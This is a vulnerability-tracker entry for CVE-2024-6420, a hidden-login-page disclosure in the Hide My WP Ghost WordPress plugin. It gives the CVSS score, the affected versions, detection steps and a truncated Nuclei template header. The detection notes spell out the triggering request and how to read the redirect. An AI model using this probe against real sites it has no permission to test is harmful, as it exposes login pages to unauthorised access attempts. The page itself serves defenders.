CVE-2024-6420
published 2024-07-23CVE-2024-6420: The Hide My WP Ghost WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an…
PriorityP260high8.6CVSS 3.1
AVNACLPRNUINSUCHILAL
EXPLOIT
EPSS
1.80%
75.8th percentile
The Hide My WP Ghost WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpplugins | hide_my_wp_ghost | < 5.2.02 | 5.2.02 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploitation attempt: send a GET request to /?gf_page=randomstring and check if the Location header contains the encoded redirect path '%2F%3Fgf_page%3Drandomstring&reauth=1' (indicating the hidden login page URL was leaked via auth_redirect), while confirming the redirect does NOT go to the default 'wp-login.php'. ↗
- →Identify vulnerable WordPress installations by checking for the presence of '/wp-content/plugins/hide-my-wp' in the page body, confirming the Hide My WP Ghost plugin is active. ↗
- →A successful exploit results in a redirect Location header that does NOT contain 'wp-login.php', meaning the hidden (custom) login page URL has been disclosed to an unauthenticated visitor. ↗
- ·The Nuclei template uses a two-step flow: step 1 confirms the plugin is present (internal matcher), and step 2 triggers the auth_redirect bypass. Both conditions must be true for a positive detection. ↗
- ·The vulnerability only affects Hide My WP Ghost versions strictly before 5.2.02; sites running 5.2.02 or later are not affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
nuclei·CVSS 8.6
CVE-2024-6420 [HIGH] Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
Template:
id: CVE-2024-6420
info:
name: Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
author: jpg0mez
severity: high
description: |
The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
impact: |
Unauthenticated attackers can discover and access the hidden WordPress login page through auth_redirect exploitation, bypassing the plugin's security obfuscation.
remediation: |
Update Hide My WP Ghost plugin to versio
No writeups or analysis indexed.
2024-07-23
Published